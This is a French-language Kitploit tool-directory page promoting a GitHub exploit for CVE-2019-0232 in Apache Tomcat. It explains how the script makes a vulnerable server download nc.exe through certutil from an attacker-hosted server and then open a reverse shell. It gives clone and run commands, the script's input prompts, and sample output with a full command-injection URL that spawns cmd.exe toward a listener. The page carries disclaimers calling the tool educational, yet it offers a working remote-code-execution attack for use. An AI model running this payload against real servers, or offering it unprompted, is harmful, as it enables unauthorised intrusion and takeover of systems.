Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-0232 — Salut, ceci est un code révisé et amélioré pour CVE-2019-0232 | Kitploit
Outils/GitHubGitHub/dharan10/cve-2019-0232
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubdharan10/cve-2019-0232

CVE-2019-0232

Salut, ceci est un code révisé et amélioré pour CVE-2019-0232

Voir le dépôt
22il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour Apache Tomcat CVE-2019-0232

Ce script exploite la vulnérabilité CVE-2019-0232 dans Apache Tomcat, qui permet l'exécution de code à distance via une gestion inappropriée du script ism.bat. Le script utilise une technique de reverse shell avec certutil et nc.exe (Netcat) pour obtenir un accès distant au système vulnérable.

Aperçu de la vulnérabilité :

  • Identifiant CVE : CVE-2019-0232
  • Produits concernés : Apache Tomcat 6.x, 7.x, 8.x et 9.x
  • Description :
    • CVE-2019-0232 est une vulnérabilité dans la gestion par Apache Tomcat des requêtes vers ism.bat qui pourrait permettre à des attaquants d'exécuter des commandes arbitraires sur le serveur. Cette vulnérabilité survient en raison d'une absence de validation appropriée des entrées utilisateur, permettant aux attaquants de déclencher l'exécution de commandes arbitraires via une requête spécialement conçue.
    • La vulnérabilité peut être exploitée pour télécharger un fichier nc.exe malveillant depuis un serveur distant et l'utiliser pour générer un reverse shell.

Prérequis :

  • Python 3 : Le script est conçu pour Python 3.x.
  • Netcat : Un écouteur Netcat (nc.exe) doit être hébergé sur un serveur pour la connexion reverse shell.
  • Apache Tomcat : Le serveur cible doit exécuter une version vulnérable d'Apache Tomcat (6.x, 7.x, 8.x ou 9.x) sensible à CVE-2019-0232.

Comment ça marche :

  1. Téléchargement de nc.exe : Le script envoie une requête spécialement conçue au serveur Tomcat vulnérable pour télécharger le fichier nc.exe (Netcat) sur la machine cible à l'aide de certutil.
  2. Reverse Shell : Une fois nc.exe téléchargé, une autre requête est envoyée pour exécuter la commande reverse shell, qui se connecte à l'écouteur Netcat de l'attaquant.

Utilisation :

1. Clonez le dépôt :

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. Modifiez le script ou exécutez-le avec des entrées utilisateur :

root@kitploit:~
python3 exploit.py

3. Vous serez invité à saisir les informations suivantes :

root@kitploit:~
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.

Exemple :

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

Une fois exécuté avec succès, vous devriez avoir une connexion reverse shell vers votre écouteur Netcat.

Avertissement :

Ce script est destiné uniquement à des fins éducatives. Ne l'utilisez pas pour des activités malveillantes. Obtenez toujours une autorisation appropriée avant de tenter un test d'intrusion ou un audit de sécurité. Une mauvaise utilisation de ce script pourrait entraîner des conséquences juridiques.

Remarques importantes :

Assurez-vous que le serveur Apache Tomcat n'est pas corrigé contre CVE-2019-0232 avant d'utiliser cet exploit. Le script peut nécessiter des privilèges administratifs en fonction de la configuration du système cible.

Auteur :

Auteur : A!Z3N(Dharan) Fait avec puissance !

Licence :

Ce projet est sous licence MIT.

Cependant, utilisez-le à vos propres risques. Ce code est fourni uniquement à des fins éducatives. En utilisant ce code, vous acceptez d'assumer l'entière responsabilité des actions découlant de son utilisation. Une utilisation abusive ou non autorisée de cet exploit peut entraîner des conséquences juridiques. Obtenez toujours une autorisation appropriée avant d'effectuer des tests de sécurité ou des tests d'intrusion sur un quelconque système.

Vous êtes libre d'utiliser, de modifier et de distribuer ce code, mais uniquement à des fins éthiques. L'auteur n'est pas responsable des dommages causés par ce code.

N'utilisez pas cet exploit sans l'autorisation explicite du propriétaire du système cible.

Télécharger l’outil